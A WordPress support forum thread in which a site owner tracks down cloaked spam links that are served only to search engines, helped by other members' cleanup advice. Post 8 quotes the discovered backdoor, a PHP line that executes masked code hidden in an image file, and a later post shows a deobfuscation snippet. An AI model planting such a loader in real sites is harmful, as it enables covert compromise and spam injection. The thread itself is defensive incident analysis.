WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Stealth Link Injection (18 posts)

  1. omatan
    Member
    Posted 2 years ago #

    My site (http://seattlerueda.com) has been injected with links that are only visible to search engines - clearly for SERP improvement. See image from google's cache :

    http://seattlerueda.com/sr-link-injection.jpg

    The hack is clever in that when I use agent switcher in my browser the version sent to the browser has none of the links. Since I cannot recreate it, it's hard to track it down through the code. I am running 3.3.2.

    Has anyone heard/seen this and have ideas where to find the rogue code ?

    Thanks,

    -Ofer

  2. adpawl
    Member
    Posted 2 years ago #

  3. You might want to go and ask these guys for help - http://sucuri.net/
    They do this for a fee, but I'm sure they can help.

    Otherwise, their blog might have some info.

  4. esmi
    Forum Moderator
    Posted 2 years ago #

    That's an interesting one - especially as sucuri.net's scan isn't picking it up. It might be worth contacting them about it.

    unmaskparasites.com, however did find the links: Scan result

  5. omatan
    Member
    Posted 2 years ago #

    @adpawl - i've seen these posts - I am looking for leads to identify this particular problem. Clearly I can try rebuilding, but that would be my last resort.

    @esmi - thanks for the reference to unmaskparasites.com - didn't know of that resource.

    My main concern is being able to replicate the links on my browser - if I could do that I am certain I could identify where the breach is.

  6. My main concern is being able to replicate the links on my browser - if I could do that I am certain I could identify where the breach is.

    Try putting this into the browser:

    site:seattlerueda.com viagra

    https://www.google.ca/search?q=site%3Aseattlerueda.com+viagra&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

  7. adpawl
    Member
    Posted 2 years ago #

    I can not reproduce this problem in my browser, but google cache help

    Links are inserted before <div id="main">
    Look first in your header.php
    Try check your files by modyficacion time.

  8. omatan
    Member
    Posted 2 years ago #

    @zooini - this isn't the pharma hack

    adpawl - the problem is i wanted to recreate it in my broswer off the code - so I can trace how it occurs by turning things off
    Seeing it in the google cache is useful to see where it occurs but doesn't help me pinpoint which plugin or template or core area is affected. I did however look in the header of my theme and found what is likely the problem:

    <?php $wp__theme_icon=@create_function('',@file_get_contents('...../s.gif'));$wp__theme_icon(); ?>

    The s.gif file was some masked php code. I can't test if that total solved it, but will wait till there is a new google cache.

    Thanks.

  9. adpawl
    Member
    Posted 2 years ago #

    @omatan, can you add code of this file to a service like Pastebin (pastebin.com, wordpress.pastebin.ca) then add your link to the post? Or send this file to my mail adpawl.it [ AT ] gmail.com ?

  10. MickeyRoush
    Member
    Posted 2 years ago #

    @ omatan

    First go to your site in Firefox. Then see if you can view generated source. I have so many web developer add-ons for firefox, I'm not sure if it's in the default Firefox install or not. But it will show more than just view source, especially if a site is hacked.

    Second, go download freefilesync:
    http://sourceforge.net/projects/freefilesync/

    It will allow you to compare fresh themes/plugins/core against your current install. It will tell you which files have different content/attributes. Then use a tool like WinMerge or KDiff to see the differences within each file specifically.

  11. omatan
    Member
    Posted 2 years ago #

    @adpawl - here it is : http://pastebin.com/Gztx7pSg

  12. adpawl
    Member
    Posted 2 years ago #

    Its, your real code http://pastebin.com/GdYfk4XJ ;-)

  13. adpawl
    Member
    Posted 2 years ago #

    This means that the checked is User-Agent and IP range: http://pastebin.com/gZerFJPF

  14. omatan
    Member
    Posted 2 years ago #

    Thanks. sneaky devils. that't confirms what I suspected that IP addresses were checked. exactly to fool you if you used an agent switcher.

    what tool do you use to deocde the php source ?

  15. adpawl
    Member
    Posted 2 years ago #

    I use only my head.
    ...well, maybe still n++ and php - of course ;-p

  16. omatan
    Member
    Posted 2 years ago #

    I don't understand. How do you get from the masked code http://pastebin.com/Gztx7pSg to "real code" : http://pastebin.com/GdYfk4XJ

  17. adpawl
    Member
    Posted 2 years ago #

    Is magic!
    -joke :)

    Analysis and appropriate modification of the code.
    enough to apply
    echo preg_replace("{$giNuGYt}".'/','$2$1',$o3m9n6V($L5tsc7));

Topic Closed

This topic has been closed to new replies.

About this Topic